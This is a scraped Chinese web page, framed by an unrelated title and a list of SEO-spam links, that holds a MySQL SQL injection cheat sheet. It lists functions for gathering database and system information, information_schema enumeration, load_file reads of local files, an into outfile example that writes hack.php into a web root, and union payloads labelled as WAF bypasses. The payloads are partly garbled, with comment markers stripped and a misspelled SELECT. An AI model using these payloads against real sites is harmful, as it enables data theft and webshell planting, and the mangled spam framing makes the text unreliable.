当前位置: 首页 > news >正文

找工程去哪个网站/系统优化大师免费版

找工程去哪个网站,系统优化大师免费版,做政府网站的,车票网站模板/...//!.../ 内联注释/*!50000select */(mysql版本大于50000执行)[ ] mysql中一些函数system_user()系统用户名user()用户名current_user()当前用户名session_user()连接数据库的用户名database() 数据库名version()MySql数据库版本load_file()MySql读取本地文件的函…

/.../

/!.../ 内联注释/*!50000select */(mysql版本大于50000执行)

[ ] mysql中一些函数

system_user()系统用户名

user()用户名

current_user()当前用户名

session_user()连接数据库的用户名

database() 数据库名

version()MySql数据库版本

load_file()MySql读取本地文件的函数

@@datadir 读取数据库路径

@@basedir MySql安装路径

@@version_compile_os 操作系统Windows Server 2003

[ ] mysql漏洞利用函数:into outfile()

into_outfile()写文件操作

前提:

文件名必须全路径(绝对路径),

用户必须有写文件的权限

没有对’单引号过滤

SELLECT''into outfile'D://phpStudy//WWW//hack.php'

[ ] mysql链接 字符串函数

concat(str1,str2)

concat_ws(separator,str1,str2...)

group_concat(str1,str2....)

MySql的concat函数可以连接一个或者多个字符串

concat(username,0x23,password,0x23...)

concat_ws()函数,表示concat with separator,即有分隔符的字符串连接

group_concat()函数,把每一行数据分到一个组里显示出来

[ ] mysql联合查询注入必备知识点

information_schema(mysql5.0)信息数据库。其中保存着关于MySql服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等

SCHEMATA表:(所有的数据库名在这个表)提供了当前mysql事例中所有的数据库信息。是show databases的结果取之此表。

TABLES表:(所有的数据库的表名在这个表)提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建表的时间等信息。是show tables from schemaname的结果取之此表。

COLUMNS表:(所有数据库的表名中的所有列在这个表)提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

[ ] mysql联合查询规则

UNION必须由两条或者两条以上的SELECT语句组成,语句之间用关键字UNION分隔

UNION中的每个查询必须包含相同的列

UNION会从查询结果集中自动去除了重复行

[ ]过狗语句

?id=-1 /!50001union//!50001select/1,table_name,3,4,5 /!50001from/ information_schema.tables where table_schema='newbaji'

load_file()读取可以单个斜线

?id=-1 /!50001union//!50001select/

1,load_file('d:/pass.txt'),3,4,5

into outfile 'd://aaa.txt'(写入必须双//)

?id=-1 /!50001union//!50001select/1,'',3,4,5 into outfile 'd:\2.txt';

http://www.jmfq.cn/news/5056183.html

相关文章:

  • 菏泽建设/云速seo百度点击
  • 网站开发工具的功能有哪些/品牌推广计划
  • 做网站需要vps吗/手机如何制作网页链接
  • 郑州建站优化/湖南专业的关键词优化
  • 网站建设基本要求/百度推广代运营公司
  • 做app的网站有哪些功能/seo薪资
  • 做游戏平面设计好的素材网站有哪些/b站推广平台
  • 前后端分离企业网站源码/搜狗指数
  • 昆明做网站哪家便宜/百度seo快速排名优化
  • 杭州企业营销网站建设公司/网络seo是什么工作
  • 学校网站建设的作用/百度公司的企业文化
  • 三明鑫龙建设工程网站/泰州seo外包公司
  • 西安做企业网站排名/app推广代理平台
  • 宁夏快速自助制作网站/免费制作自己的网页
  • 西宁网站推广/福州短视频seo方法
  • 嘉兴自助建站模板/深圳seo网络优化公司
  • 公司网站首页怎么制作/网站快速优化排名官网
  • 网站开发core文件作用/新闻软文范例大全
  • 杭州 高端网站建设 推荐/网络推广网络营销和网站推广的区别
  • 企业微信下载官方网站/百度招聘
  • 怎样用b2b网站开发客户/上海网站建设关键词排名
  • 毕设做网站太简单/网站建设的流程及步骤
  • 3d建模一般学费多少/yoast seo教程
  • 软件开发网站建设维护/网络公司取什么名字好
  • 以前自己做的网站怎么样删除/营口seo
  • 设计成功一个电子商务网站/企业员工培训内容及计划
  • 小程序在哪个网站做/千锋教育课程
  • 网站做微信小程序号码/互联网营销是什么
  • 东莞公司网站价格/seo顾问服
  • 网络营销的培训课程视频/seo推广外包报价表